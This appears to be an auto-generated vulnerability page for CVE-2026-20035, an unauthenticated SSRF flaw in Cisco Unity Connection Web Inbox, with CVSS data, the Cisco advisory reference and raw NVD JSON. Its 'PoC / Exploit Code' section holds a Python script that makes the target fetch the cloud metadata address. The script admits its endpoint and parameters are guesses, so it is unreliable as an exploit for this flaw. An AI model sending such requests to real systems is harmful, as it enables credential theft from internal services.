Security Vulnerability Report
CVE-2026-20035 CVSS 7.2 HIGH

Published: 2026-05-06 17:16:20
Last Modified: 2026-05-06 18:59:53

Description

A vulnerability in the web UI of Cisco Unity Connection Web Inbox could allow an unauthenticated, remote attacker to conduct SSRF attacks through an affected device. This vulnerability is due to improper input validation for specific HTTP requests. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to send arbitrary network requests that are sourced from the affected device.

CVSS Details

CVSS Score: 7.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Cisco Unity Connection Web Inbox (for the specific affected versions, refer to the official Cisco advisory cisco-sa-unity-rce-ssrf-hENhuASy)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Proof of Concept for CVE-2026-20035
# Target: Cisco Unity Connection Web Inbox
# Description: This script demonstrates how an unauthenticated attacker might
# trigger the SSRF vulnerability.

TARGET_URL = "http://<target-ip>/webinbox/vulnerable_endpoint"
# Example internal URL to access (e.g., AWS metadata, internal admin panel)
MALICIOUS_URL = "http://169.254.169.254/latest/meta-data/"


def exploit_ssrf():
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                      "(KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded",
    }
    # Payload structure based on the vulnerability description (parameter names are hypothetical)
    payload = {
        "target": MALICIOUS_URL,
        "action": "import",
    }
    try:
        print(f"[*] Sending SSRF request to {TARGET_URL}...")
        response = requests.post(TARGET_URL, data=payload, headers=headers, timeout=10)
        if response.status_code == 200:
            print("[+] Request sent successfully!")
            print("[+] Response from server:")
            print(response.text[:500])  # Print first 500 chars of response
        else:
            print(f"[-] Server returned status code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] An error occurred: {e}")


if __name__ == "__main__":
    exploit_ssrf()
```

References

Cisco Security Advisory cisco-sa-unity-rce-ssrf-hENhuASy: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-unity-rce-ssrf-hENhuASy
Weakness: CWE-918 (Server-Side Request Forgery)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-20035",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-06T17:16:20.280",
    "lastModified": "2026-05-06T18:59:53.230",
    "vulnStatus": "Awaiting Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A vulnerability in the web UI of Cisco Unity Connection Web Inbox could allow an unauthenticated, remote attacker to conduct SSRF attacks through an affected device.\r\n\r\nThis vulnerability is due to improper input validation for specific HTTP requests. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to send arbitrary network requests that are sourced from the affected device."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-918"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-unity-rce-ssrf-hENhuASy",
        "source": "[email protected]"
      }
    ]
  }
}
```